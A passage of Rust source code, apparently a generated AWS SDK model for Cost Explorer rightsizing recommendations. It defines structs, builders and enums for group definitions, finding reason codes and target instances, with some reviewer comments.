        let mut formatter = f.debug_struct("GroupDefinition");
        formatter.field("r#type", &self.r#type);
        formatter.field("key", &self.key);
        formatter.finish()
    }
}
/// See [`GroupDefinition`](crate::model::GroupDefinition)
pub mod group_definition {
    /// A builder for [`GroupDefinition`](crate::model::GroupDefinition)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) r#type: std::option::Option<crate::model::GroupDefinitionType>,
        pub(crate) key: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The string that represents the type of group.</p>
        pub fn r#type(mut self, input: crate::model::GroupDefinitionType) -> Self {
            self.r#type = Some(input);
            self
        }
        /// <p>The string that represents the type of group.</p>
        pub fn set_type(
            mut self,
            input: std::option::Option<crate::model::GroupDefinitionType>,
        ) -> Self {
            self.r#type = input;
            self
        }
        /// <p>The string that represents a key for a specified group.</p>
        pub fn key(mut self, input: impl Into<std::string::String>) -> Self {
            self.key = Some(input.into());
            self
        }
        /// <p>The string that represents a key for a specified group.</p>
        pub fn set_key(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.key = input;
            self
        }
        /// Consumes the builder and constructs a [`GroupDefinition`](crate::model::GroupDefinition)
        pub fn build(self) -> crate::model::GroupDefinition {
            crate::model::GroupDefinition {
                r#type: self.r#type,
                key: self.key,
            }
        }
    }
}
impl GroupDefinition {
    /// Creates a new builder-style object to manufacture [`GroupDefinition`](crate::model::GroupDefinition)
    pub fn builder() -> crate::model::group_definition::Builder {
        crate::model::group_definition::Builder::default()
    }
}
/// The kind of grouping criterion, exchanged with the service in its
/// SCREAMING_SNAKE_CASE wire form (see [`GroupDefinitionType::as_str`]).
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum GroupDefinitionType {
    CostCategory,
    Dimension,
    Tag,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for GroupDefinitionType {
    // Unrecognized wire strings are preserved verbatim inside `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "COST_CATEGORY" => Self::CostCategory,
            "DIMENSION" => Self::Dimension,
            "TAG" => Self::Tag,
            other => Self::Unknown(other.to_owned()),
        }
    }
}
impl std::str::FromStr for GroupDefinitionType {
    type Err = std::convert::Infallible;
    // Parsing never fails: any string maps to `Unknown` at worst.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl GroupDefinitionType {
    /// Returns the wire-format string for this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::CostCategory => "COST_CATEGORY",
            Self::Dimension => "DIMENSION",
            Self::Tag => "TAG",
            Self::Unknown(s) => s.as_ref(),
        }
    }
    /// Returns every wire value known when this code was generated.
    pub fn values() -> &'static [&'static str] {
        &["COST_CATEGORY", "DIMENSION", "TAG"]
    }
}
impl AsRef<str> for GroupDefinitionType {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>You can use <code>RightsizingRecommendationConfiguration</code> to customize
/// recommendations across two attributes. You can choose to view recommendations for
/// instances within the same instance families or across different instance families. You
/// can also choose to view your estimated savings that are associated with recommendations
/// with consideration of existing Savings Plans or RI benefits, or neither. </p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RightsizingRecommendationConfiguration {
    /// <p>The option to see recommendations within the same instance family or recommendations
    /// for instances across other families. The default value is
    /// <code>SAME_INSTANCE_FAMILY</code>. </p>
    pub recommendation_target: std::option::Option<crate::model::RecommendationTarget>,
    /// <p>The option to consider RI or Savings Plans discount benefits in your savings
    /// calculation. The default value is <code>TRUE</code>. </p>
    pub benefits_considered: bool,
}
impl std::fmt::Debug for RightsizingRecommendationConfiguration {
    // Hand-written Debug listing every field; keep in sync with the struct above.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        let mut formatter = f.debug_struct("RightsizingRecommendationConfiguration");
        formatter.field("recommendation_target", &self.recommendation_target);
        formatter.field("benefits_considered", &self.benefits_considered);
        formatter.finish()
    }
}
/// See [`RightsizingRecommendationConfiguration`](crate::model::RightsizingRecommendationConfiguration)
pub mod rightsizing_recommendation_configuration {
    /// A builder for [`RightsizingRecommendationConfiguration`](crate::model::RightsizingRecommendationConfiguration)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) recommendation_target: std::option::Option<crate::model::RecommendationTarget>,
        pub(crate) benefits_considered: std::option::Option<bool>,
    }
    impl Builder {
        /// <p>The option to see recommendations within the same instance family or recommendations
        /// for instances across other families. The default value is
        /// <code>SAME_INSTANCE_FAMILY</code>. </p>
        pub fn recommendation_target(mut self, input: crate::model::RecommendationTarget) -> Self {
            self.recommendation_target = Some(input);
            self
        }
        /// <p>The option to see recommendations within the same instance family or recommendations
        /// for instances across other families.</p>
        pub fn set_recommendation_target(
            mut self,
            input: std::option::Option<crate::model::RecommendationTarget>,
        ) -> Self {
            self.recommendation_target = input;
            self
        }
        /// <p>The option to consider RI or Savings Plans discount benefits in your savings
        /// calculation. The default value is <code>TRUE</code>. </p>
        pub fn benefits_considered(mut self, input: bool) -> Self {
            self.benefits_considered = Some(input);
            self
        }
        /// <p>The option to consider RI or Savings Plans discount benefits in your savings
        /// calculation.</p>
        pub fn set_benefits_considered(mut self, input: std::option::Option<bool>) -> Self {
            self.benefits_considered = input;
            self
        }
        /// Consumes the builder and constructs a [`RightsizingRecommendationConfiguration`](crate::model::RightsizingRecommendationConfiguration)
        pub fn build(self) -> crate::model::RightsizingRecommendationConfiguration {
            crate::model::RightsizingRecommendationConfiguration {
                recommendation_target: self.recommendation_target,
                // NOTE(review): an unset value falls back to bool::default()
                // (false) here, while the field docs say the service default is
                // TRUE — presumably the service-side default applies only when
                // the field is omitted from the request; confirm against the
                // serializer.
                benefits_considered: self.benefits_considered.unwrap_or_default(),
            }
        }
    }
}
impl RightsizingRecommendationConfiguration {
    /// Creates a new builder-style object to manufacture [`RightsizingRecommendationConfiguration`](crate::model::RightsizingRecommendationConfiguration)
    pub fn builder() -> crate::model::rightsizing_recommendation_configuration::Builder {
        crate::model::rightsizing_recommendation_configuration::Builder::default()
    }
}
/// The instance-family scope of rightsizing recommendations, exchanged with
/// the service in its SCREAMING_SNAKE_CASE wire form (see
/// [`RecommendationTarget::as_str`]).
#[non_exhaustive]
#[derive(
    std::clone::Clone,
    std::cmp::Eq,
    std::cmp::Ord,
    std::cmp::PartialEq,
    std::cmp::PartialOrd,
    std::fmt::Debug,
    std::hash::Hash,
)]
pub enum RecommendationTarget {
    CrossInstanceFamily,
    SameInstanceFamily,
    /// Unknown contains new variants that have been added since this code was generated.
    Unknown(String),
}
impl std::convert::From<&str> for RecommendationTarget {
    // Unrecognized wire strings are preserved verbatim inside `Unknown`.
    fn from(s: &str) -> Self {
        match s {
            "CROSS_INSTANCE_FAMILY" => Self::CrossInstanceFamily,
            "SAME_INSTANCE_FAMILY" => Self::SameInstanceFamily,
            other => Self::Unknown(other.to_owned()),
        }
    }
}
impl std::str::FromStr for RecommendationTarget {
    type Err = std::convert::Infallible;
    // Parsing never fails: any string maps to `Unknown` at worst.
    fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
        Ok(s.into())
    }
}
impl RecommendationTarget {
    /// Returns the wire-format string for this variant.
    pub fn as_str(&self) -> &str {
        match self {
            Self::CrossInstanceFamily => "CROSS_INSTANCE_FAMILY",
            Self::SameInstanceFamily => "SAME_INSTANCE_FAMILY",
            Self::Unknown(s) => s.as_ref(),
        }
    }
    /// Returns every wire value known when this code was generated.
    pub fn values() -> &'static [&'static str] {
        &["CROSS_INSTANCE_FAMILY", "SAME_INSTANCE_FAMILY"]
    }
}
impl AsRef<str> for RecommendationTarget {
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>Recommendations to rightsize resources.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct RightsizingRecommendation {
    /// <p>The account that this recommendation is for.</p>
    pub account_id: std::option::Option<std::string::String>,
    /// <p>Context regarding the current instance.</p>
    pub current_instance: std::option::Option<crate::model::CurrentInstance>,
    /// <p>A recommendation to either terminate or modify the resource.</p>
    pub rightsizing_type: std::option::Option<crate::model::RightsizingType>,
    /// <p>The details for the modification recommendations. </p>
    pub modify_recommendation_detail: std::option::Option<crate::model::ModifyRecommendationDetail>,
    /// <p>The details for termination recommendations.</p>
    pub terminate_recommendation_detail:
        std::option::Option<crate::model::TerminateRecommendationDetail>,
    /// <p> The list of possible reasons why the recommendation is generated such as under or
    /// over utilization of specific metrics (for example, CPU, Memory, Network). </p>
    pub finding_reason_codes: std::option::Option<std::vec::Vec<crate::model::FindingReasonCode>>,
}
impl std::fmt::Debug for RightsizingRecommendation {
    // Hand-written Debug listing every field; keep in sync with the struct above.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        let mut formatter = f.debug_struct("RightsizingRecommendation");
        formatter.field("account_id", &self.account_id);
        formatter.field("current_instance", &self.current_instance);
        formatter.field("rightsizing_type", &self.rightsizing_type);
        formatter.field(
            "modify_recommendation_detail",
            &self.modify_recommendation_detail,
        );
        formatter.field(
            "terminate_recommendation_detail",
            &self.terminate_recommendation_detail,
        );
        formatter.field("finding_reason_codes", &self.finding_reason_codes);
        formatter.finish()
    }
}
/// See [`RightsizingRecommendation`](crate::model::RightsizingRecommendation)
pub mod rightsizing_recommendation {
    /// A builder for [`RightsizingRecommendation`](crate::model::RightsizingRecommendation)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) account_id: std::option::Option<std::string::String>,
        pub(crate) current_instance: std::option::Option<crate::model::CurrentInstance>,
        pub(crate) rightsizing_type: std::option::Option<crate::model::RightsizingType>,
        pub(crate) modify_recommendation_detail:
            std::option::Option<crate::model::ModifyRecommendationDetail>,
        pub(crate) terminate_recommendation_detail:
            std::option::Option<crate::model::TerminateRecommendationDetail>,
        pub(crate) finding_reason_codes:
            std::option::Option<std::vec::Vec<crate::model::FindingReasonCode>>,
    }
    impl Builder {
        /// <p>The account that this recommendation is for.</p>
        pub fn account_id(mut self, input: impl Into<std::string::String>) -> Self {
            self.account_id = Some(input.into());
            self
        }
        /// <p>The account that this recommendation is for.</p>
        pub fn set_account_id(mut self, input: std::option::Option<std::string::String>) -> Self {
            self.account_id = input;
            self
        }
        /// <p>Context regarding the current instance.</p>
        pub fn current_instance(mut self, input: crate::model::CurrentInstance) -> Self {
            self.current_instance = Some(input);
            self
        }
        /// <p>Context regarding the current instance.</p>
        pub fn set_current_instance(
            mut self,
            input: std::option::Option<crate::model::CurrentInstance>,
        ) -> Self {
            self.current_instance = input;
            self
        }
        /// <p>A recommendation to either terminate or modify the resource.</p>
        pub fn rightsizing_type(mut self, input: crate::model::RightsizingType) -> Self {
            self.rightsizing_type = Some(input);
            self
        }
        /// <p>A recommendation to either terminate or modify the resource.</p>
        pub fn set_rightsizing_type(
            mut self,
            input: std::option::Option<crate::model::RightsizingType>,
        ) -> Self {
            self.rightsizing_type = input;
            self
        }
        /// <p>The details for the modification recommendations. </p>
        pub fn modify_recommendation_detail(
            mut self,
            input: crate::model::ModifyRecommendationDetail,
        ) -> Self {
            self.modify_recommendation_detail = Some(input);
            self
        }
        /// <p>The details for the modification recommendations. </p>
        pub fn set_modify_recommendation_detail(
            mut self,
            input: std::option::Option<crate::model::ModifyRecommendationDetail>,
        ) -> Self {
            self.modify_recommendation_detail = input;
            self
        }
        /// <p>The details for termination recommendations.</p>
        pub fn terminate_recommendation_detail(
            mut self,
            input: crate::model::TerminateRecommendationDetail,
        ) -> Self {
            self.terminate_recommendation_detail = Some(input);
            self
        }
        /// <p>The details for termination recommendations.</p>
        pub fn set_terminate_recommendation_detail(
            mut self,
            input: std::option::Option<crate::model::TerminateRecommendationDetail>,
        ) -> Self {
            self.terminate_recommendation_detail = input;
            self
        }
        /// Appends a single reason code to `finding_reason_codes`, creating the
        /// list on first use; call `set_finding_reason_codes` to replace the
        /// whole list at once.
        pub fn finding_reason_codes(
            mut self,
            input: impl Into<crate::model::FindingReasonCode>,
        ) -> Self {
            let mut v = self.finding_reason_codes.unwrap_or_default();
            v.push(input.into());
            self.finding_reason_codes = Some(v);
            self
        }
        /// <p> The list of possible reasons why the recommendation is generated such as under or
        /// over utilization of specific metrics (for example, CPU, Memory, Network). </p>
        pub fn set_finding_reason_codes(
            mut self,
            input: std::option::Option<std::vec::Vec<crate::model::FindingReasonCode>>,
        ) -> Self {
            self.finding_reason_codes = input;
            self
        }
        /// Consumes the builder and constructs a [`RightsizingRecommendation`](crate::model::RightsizingRecommendation)
        pub fn build(self) -> crate::model::RightsizingRecommendation {
            crate::model::RightsizingRecommendation {
                account_id: self.account_id,
                current_instance: self.current_instance,
                rightsizing_type: self.rightsizing_type,
                modify_recommendation_detail: self.modify_recommendation_detail,
                terminate_recommendation_detail: self.terminate_recommendation_detail,
                finding_reason_codes: self.finding_reason_codes,
            }
        }
    }
}
impl RightsizingRecommendation {
    /// Creates a new builder-style object to manufacture [`RightsizingRecommendation`](crate::model::RightsizingRecommendation)
    pub fn builder() -> crate::model::rightsizing_recommendation::Builder {
        crate::model::rightsizing_recommendation::Builder::default()
    }
}
#[non_exhaustive]
#[derive(
std::clone::Clone,
std::cmp::Eq,
std::cmp::Ord,
std::cmp::PartialEq,
std::cmp::PartialOrd,
std::fmt::Debug,
std::hash::Hash,
)]
pub enum FindingReasonCode {
CpuOverProvisioned,
CpuUnderProvisioned,
DiskIopsOverProvisioned,
DiskIopsUnderProvisioned,
DiskThroughputOverProvisioned,
DiskThroughputUnderProvisioned,
EbsIopsOverProvisioned,
EbsIopsUnderProvisioned,
EbsThroughputOverProvisioned,
EbsThroughputUnderProvisioned,
MemoryOverProvisioned,
MemoryUnderProvisioned,
NetworkBandwidthOverProvisioned,
NetworkBandwidthUnderProvisioned,
NetworkPpsOverProvisioned,
NetworkPpsUnderProvisioned,
/// Unknown contains new variants that have been added since this code was generated.
Unknown(String),
}
impl std::convert::From<&str> for FindingReasonCode {
fn from(s: &str) -> Self {
match s {
"CPU_OVER_PROVISIONED" => FindingReasonCode::CpuOverProvisioned,
"CPU_UNDER_PROVISIONED" => FindingReasonCode::CpuUnderProvisioned,
"DISK_IOPS_OVER_PROVISIONED" => FindingReasonCode::DiskIopsOverProvisioned,
"DISK_IOPS_UNDER_PROVISIONED" => FindingReasonCode::DiskIopsUnderProvisioned,
"DISK_THROUGHPUT_OVER_PROVISIONED" => FindingReasonCode::DiskThroughputOverProvisioned,
"DISK_THROUGHPUT_UNDER_PROVISIONED" => {
FindingReasonCode::DiskThroughputUnderProvisioned
}
"EBS_IOPS_OVER_PROVISIONED" => FindingReasonCode::EbsIopsOverProvisioned,
"EBS_IOPS_UNDER_PROVISIONED" => FindingReasonCode::EbsIopsUnderProvisioned,
"EBS_THROUGHPUT_OVER_PROVISIONED" => FindingReasonCode::EbsThroughputOverProvisioned,
"EBS_THROUGHPUT_UNDER_PROVISIONED" => FindingReasonCode::EbsThroughputUnderProvisioned,
"MEMORY_OVER_PROVISIONED" => FindingReasonCode::MemoryOverProvisioned,
"MEMORY_UNDER_PROVISIONED" => FindingReasonCode::MemoryUnderProvisioned,
"NETWORK_BANDWIDTH_OVER_PROVISIONED" => {
FindingReasonCode::NetworkBandwidthOverProvisioned
}
"NETWORK_BANDWIDTH_UNDER_PROVISIONED" => {
FindingReasonCode::NetworkBandwidthUnderProvisioned
}
"NETWORK_PPS_OVER_PROVISIONED" => FindingReasonCode::NetworkPpsOverProvisioned,
"NETWORK_PPS_UNDER_PROVISIONED" => FindingReasonCode::NetworkPpsUnderProvisioned,
other => FindingReasonCode::Unknown(other.to_owned()),
}
}
}
impl std::str::FromStr for FindingReasonCode {
type Err = std::convert::Infallible;
fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
Ok(FindingReasonCode::from(s))
}
}
impl FindingReasonCode {
    /// Returns the raw API string for this variant (the `Unknown` payload is returned as-is).
    pub fn as_str(&self) -> &str {
        match self {
            FindingReasonCode::CpuOverProvisioned => "CPU_OVER_PROVISIONED",
            FindingReasonCode::CpuUnderProvisioned => "CPU_UNDER_PROVISIONED",
            FindingReasonCode::DiskIopsOverProvisioned => "DISK_IOPS_OVER_PROVISIONED",
            FindingReasonCode::DiskIopsUnderProvisioned => "DISK_IOPS_UNDER_PROVISIONED",
            FindingReasonCode::DiskThroughputOverProvisioned => "DISK_THROUGHPUT_OVER_PROVISIONED",
            FindingReasonCode::DiskThroughputUnderProvisioned => {
                "DISK_THROUGHPUT_UNDER_PROVISIONED"
            }
            FindingReasonCode::EbsIopsOverProvisioned => "EBS_IOPS_OVER_PROVISIONED",
            FindingReasonCode::EbsIopsUnderProvisioned => "EBS_IOPS_UNDER_PROVISIONED",
            FindingReasonCode::EbsThroughputOverProvisioned => "EBS_THROUGHPUT_OVER_PROVISIONED",
            FindingReasonCode::EbsThroughputUnderProvisioned => "EBS_THROUGHPUT_UNDER_PROVISIONED",
            FindingReasonCode::MemoryOverProvisioned => "MEMORY_OVER_PROVISIONED",
            FindingReasonCode::MemoryUnderProvisioned => "MEMORY_UNDER_PROVISIONED",
            FindingReasonCode::NetworkBandwidthOverProvisioned => {
                "NETWORK_BANDWIDTH_OVER_PROVISIONED"
            }
            FindingReasonCode::NetworkBandwidthUnderProvisioned => {
                "NETWORK_BANDWIDTH_UNDER_PROVISIONED"
            }
            FindingReasonCode::NetworkPpsOverProvisioned => "NETWORK_PPS_OVER_PROVISIONED",
            FindingReasonCode::NetworkPpsUnderProvisioned => "NETWORK_PPS_UNDER_PROVISIONED",
            FindingReasonCode::Unknown(s) => s.as_ref(),
        }
    }
    /// Returns all known values (excluding `Unknown`) as their raw API strings.
    pub fn values() -> &'static [&'static str] {
        &[
            "CPU_OVER_PROVISIONED",
            "CPU_UNDER_PROVISIONED",
            "DISK_IOPS_OVER_PROVISIONED",
            "DISK_IOPS_UNDER_PROVISIONED",
            "DISK_THROUGHPUT_OVER_PROVISIONED",
            "DISK_THROUGHPUT_UNDER_PROVISIONED",
            "EBS_IOPS_OVER_PROVISIONED",
            "EBS_IOPS_UNDER_PROVISIONED",
            "EBS_THROUGHPUT_OVER_PROVISIONED",
            "EBS_THROUGHPUT_UNDER_PROVISIONED",
            "MEMORY_OVER_PROVISIONED",
            "MEMORY_UNDER_PROVISIONED",
            "NETWORK_BANDWIDTH_OVER_PROVISIONED",
            "NETWORK_BANDWIDTH_UNDER_PROVISIONED",
            "NETWORK_PPS_OVER_PROVISIONED",
            "NETWORK_PPS_UNDER_PROVISIONED",
        ]
    }
}
impl AsRef<str> for FindingReasonCode {
    // Delegates to `as_str` so the enum can be used anywhere a `&str` is accepted.
    fn as_ref(&self) -> &str {
        self.as_str()
    }
}
/// <p>Details on termination recommendation. </p>
// Optional fields are `None` when the service omits them; construct via `Self::builder()`.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct TerminateRecommendationDetail {
    /// <p>The estimated savings that result from modification, on a monthly basis.</p>
    pub estimated_monthly_savings: std::option::Option<std::string::String>,
    /// <p>The currency code that Amazon Web Services used to calculate the costs for this
    /// instance.</p>
    pub currency_code: std::option::Option<std::string::String>,
}
impl std::fmt::Debug for TerminateRecommendationDetail {
    /// Renders the struct with one entry per field.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("TerminateRecommendationDetail")
            .field("estimated_monthly_savings", &self.estimated_monthly_savings)
            .field("currency_code", &self.currency_code)
            .finish()
    }
}
/// See [`TerminateRecommendationDetail`](crate::model::TerminateRecommendationDetail)
pub mod terminate_recommendation_detail {
    /// A builder for [`TerminateRecommendationDetail`](crate::model::TerminateRecommendationDetail)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) estimated_monthly_savings: std::option::Option<std::string::String>,
        pub(crate) currency_code: std::option::Option<std::string::String>,
    }
    impl Builder {
        /// <p>The estimated savings that result from modification, on a monthly basis.</p>
        pub fn estimated_monthly_savings(mut self, input: impl Into<std::string::String>) -> Self {
            self.estimated_monthly_savings = Some(input.into());
            self
        }
        /// Sets `estimated_monthly_savings`, replacing any previously stored value.
        pub fn set_estimated_monthly_savings(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_monthly_savings = input;
            self
        }
        /// <p>The currency code that Amazon Web Services used to calculate the costs for this
        /// instance.</p>
        pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
            self.currency_code = Some(input.into());
            self
        }
        /// Sets `currency_code`, replacing any previously stored value.
        pub fn set_currency_code(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.currency_code = input;
            self
        }
        /// Consumes the builder and constructs a [`TerminateRecommendationDetail`](crate::model::TerminateRecommendationDetail)
        pub fn build(self) -> crate::model::TerminateRecommendationDetail {
            crate::model::TerminateRecommendationDetail {
                estimated_monthly_savings: self.estimated_monthly_savings,
                currency_code: self.currency_code,
            }
        }
    }
}
impl TerminateRecommendationDetail {
    /// Returns a fresh, all-`None` [`Builder`](crate::model::terminate_recommendation_detail::Builder)
    /// for assembling a [`TerminateRecommendationDetail`](crate::model::TerminateRecommendationDetail).
    pub fn builder() -> crate::model::terminate_recommendation_detail::Builder {
        std::default::Default::default()
    }
}
/// <p> Details on the modification recommendation.</p>
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct ModifyRecommendationDetail {
    // NOTE(review): the original doc here ("Determines whether this instance type is the
    // Amazon Web Services default recommendation") was copy-pasted from a boolean field;
    // this field is actually the list of recommended target instances.
    /// <p>Details on the target instance types recommended for this modification.</p>
    pub target_instances: std::option::Option<std::vec::Vec<crate::model::TargetInstance>>,
}
impl std::fmt::Debug for ModifyRecommendationDetail {
    /// Renders the struct with one entry per field.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("ModifyRecommendationDetail")
            .field("target_instances", &self.target_instances)
            .finish()
    }
}
/// See [`ModifyRecommendationDetail`](crate::model::ModifyRecommendationDetail)
pub mod modify_recommendation_detail {
    /// A builder for [`ModifyRecommendationDetail`](crate::model::ModifyRecommendationDetail)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) target_instances:
            std::option::Option<std::vec::Vec<crate::model::TargetInstance>>,
    }
    impl Builder {
        /// Appends an item to `target_instances`; use [`Self::set_target_instances`]
        /// to replace the whole list.
        pub fn target_instances(mut self, input: impl Into<crate::model::TargetInstance>) -> Self {
            let mut v = self.target_instances.unwrap_or_default();
            v.push(input.into());
            self.target_instances = Some(v);
            self
        }
        /// Sets `target_instances`, replacing any previously appended items.
        pub fn set_target_instances(
            mut self,
            input: std::option::Option<std::vec::Vec<crate::model::TargetInstance>>,
        ) -> Self {
            self.target_instances = input;
            self
        }
        /// Consumes the builder and constructs a [`ModifyRecommendationDetail`](crate::model::ModifyRecommendationDetail)
        pub fn build(self) -> crate::model::ModifyRecommendationDetail {
            crate::model::ModifyRecommendationDetail {
                target_instances: self.target_instances,
            }
        }
    }
}
impl ModifyRecommendationDetail {
    /// Returns a fresh, all-`None` [`Builder`](crate::model::modify_recommendation_detail::Builder)
    /// for assembling a [`ModifyRecommendationDetail`](crate::model::ModifyRecommendationDetail).
    pub fn builder() -> crate::model::modify_recommendation_detail::Builder {
        std::default::Default::default()
    }
}
/// <p>Details on recommended instance.</p>
// Optional fields are `None` when the service omits them; construct via `Self::builder()`.
#[non_exhaustive]
#[derive(std::clone::Clone, std::cmp::PartialEq)]
pub struct TargetInstance {
    /// <p>The expected cost to operate this instance type on a monthly basis.</p>
    pub estimated_monthly_cost: std::option::Option<std::string::String>,
    /// <p>The estimated savings that result from modification, on a monthly basis.</p>
    pub estimated_monthly_savings: std::option::Option<std::string::String>,
    /// <p>The currency code that Amazon Web Services used to calculate the costs for this
    /// instance.</p>
    pub currency_code: std::option::Option<std::string::String>,
    /// <p>Determines whether this recommendation is the defaulted Amazon Web Services
    /// recommendation.</p>
    pub default_target_instance: bool,
    /// <p>Details on the target instance type. </p>
    pub resource_details: std::option::Option<crate::model::ResourceDetails>,
    /// <p>The expected utilization metrics for target instance type.</p>
    pub expected_resource_utilization: std::option::Option<crate::model::ResourceUtilization>,
    /// <p> Explains the actions you might need to take in order to successfully migrate your
    /// workloads from the current instance type to the recommended instance type. </p>
    pub platform_differences: std::option::Option<std::vec::Vec<crate::model::PlatformDifference>>,
}
impl std::fmt::Debug for TargetInstance {
    /// Renders the struct with one entry per field.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("TargetInstance")
            .field("estimated_monthly_cost", &self.estimated_monthly_cost)
            .field("estimated_monthly_savings", &self.estimated_monthly_savings)
            .field("currency_code", &self.currency_code)
            .field("default_target_instance", &self.default_target_instance)
            .field("resource_details", &self.resource_details)
            .field(
                "expected_resource_utilization",
                &self.expected_resource_utilization,
            )
            .field("platform_differences", &self.platform_differences)
            .finish()
    }
}
/// See [`TargetInstance`](crate::model::TargetInstance)
pub mod target_instance {
    /// A builder for [`TargetInstance`](crate::model::TargetInstance)
    #[non_exhaustive]
    #[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
    pub struct Builder {
        pub(crate) estimated_monthly_cost: std::option::Option<std::string::String>,
        pub(crate) estimated_monthly_savings: std::option::Option<std::string::String>,
        pub(crate) currency_code: std::option::Option<std::string::String>,
        pub(crate) default_target_instance: std::option::Option<bool>,
        pub(crate) resource_details: std::option::Option<crate::model::ResourceDetails>,
        pub(crate) expected_resource_utilization:
            std::option::Option<crate::model::ResourceUtilization>,
        pub(crate) platform_differences:
            std::option::Option<std::vec::Vec<crate::model::PlatformDifference>>,
    }
    impl Builder {
        /// <p>The expected cost to operate this instance type on a monthly basis.</p>
        pub fn estimated_monthly_cost(mut self, input: impl Into<std::string::String>) -> Self {
            self.estimated_monthly_cost = Some(input.into());
            self
        }
        /// Sets `estimated_monthly_cost`, replacing any previously stored value.
        pub fn set_estimated_monthly_cost(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_monthly_cost = input;
            self
        }
        /// <p>The estimated savings that result from modification, on a monthly basis.</p>
        pub fn estimated_monthly_savings(mut self, input: impl Into<std::string::String>) -> Self {
            self.estimated_monthly_savings = Some(input.into());
            self
        }
        /// Sets `estimated_monthly_savings`, replacing any previously stored value.
        pub fn set_estimated_monthly_savings(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.estimated_monthly_savings = input;
            self
        }
        /// <p>The currency code that Amazon Web Services used to calculate the costs for this
        /// instance.</p>
        pub fn currency_code(mut self, input: impl Into<std::string::String>) -> Self {
            self.currency_code = Some(input.into());
            self
        }
        /// Sets `currency_code`, replacing any previously stored value.
        pub fn set_currency_code(
            mut self,
            input: std::option::Option<std::string::String>,
        ) -> Self {
            self.currency_code = input;
            self
        }
        /// <p>Determines whether this recommendation is the defaulted Amazon Web Services
        /// recommendation.</p>
        pub fn default_target_instance(mut self, input: bool) -> Self {
            self.default_target_instance = Some(input);
            self
        }
        /// Sets `default_target_instance`; `None` becomes `false` at build time.
        pub fn set_default_target_instance(mut self, input: std::option::Option<bool>) -> Self {
            self.default_target_instance = input;
            self
        }
        /// <p>Details on the target instance type. </p>
        pub fn resource_details(mut self, input: crate::model::ResourceDetails) -> Self {
            self.resource_details = Some(input);
            self
        }
        /// Sets `resource_details`, replacing any previously stored value.
        pub fn set_resource_details(
            mut self,
            input: std::option::Option<crate::model::ResourceDetails>,
        ) -> Self {
            self.resource_details = input;
            self
        }
        /// <p>The expected utilization metrics for target instance type.</p>
        pub fn expected_resource_utilization(
            mut self,
            input: crate::model::ResourceUtilization,
        ) -> Self {
            self.expected_resource_utilization = Some(input);
            self
        }
        /// Sets `expected_resource_utilization`, replacing any previously stored value.
        pub fn set_expected_resource_utilization(
            mut self,
            input: std::option::Option<crate::model::ResourceUtilization>,
        ) -> Self {
            self.expected_resource_utilization = input;
            self
        }
        /// Appends an item to `platform_differences`; use
        /// [`Self::set_platform_differences`] to replace the whole list.
        pub fn platform_differences(
            mut self,
            input: impl Into<crate::model::PlatformDifference>,
        ) -> Self {
            let mut v = self.platform_differences.unwrap_or_default();
            v.push(input.into());
            self.platform_differences = Some(v);
            self
        }
        /// Sets `platform_differences`, replacing any previously appended items.
        pub fn set_platform_differences(
            mut self,
            input: std::option::Option<std::vec::Vec<crate::model::PlatformDifference>>,
        ) -> Self {
            self.platform_differences = input;
            self
        }
        /// Consumes the builder and constructs a [`TargetInstance`](crate::model::TargetInstance)
        pub fn build(self) -> crate::model::TargetInstance {
            crate::model::TargetInstance {
                estimated_monthly_cost: self.estimated_monthly_cost,
                estimated_monthly_savings: self.estimated_monthly_savings,
                currency_code: self.currency_code,
                default_target_instance: self.default_target_instance.unwrap_or_default(),
                resource_details: self.resource_details,
                expected_resource_utilization: self.expected_resource_utilization,
                platform_differences: self.platform_differences,
            }
        }
    }
}
impl TargetInstance {
    /// Returns a fresh, all-`None` [`Builder`](crate::model::target_instance::Builder)
    /// for assembling a [`TargetInstance`](crate::model::TargetInstance).
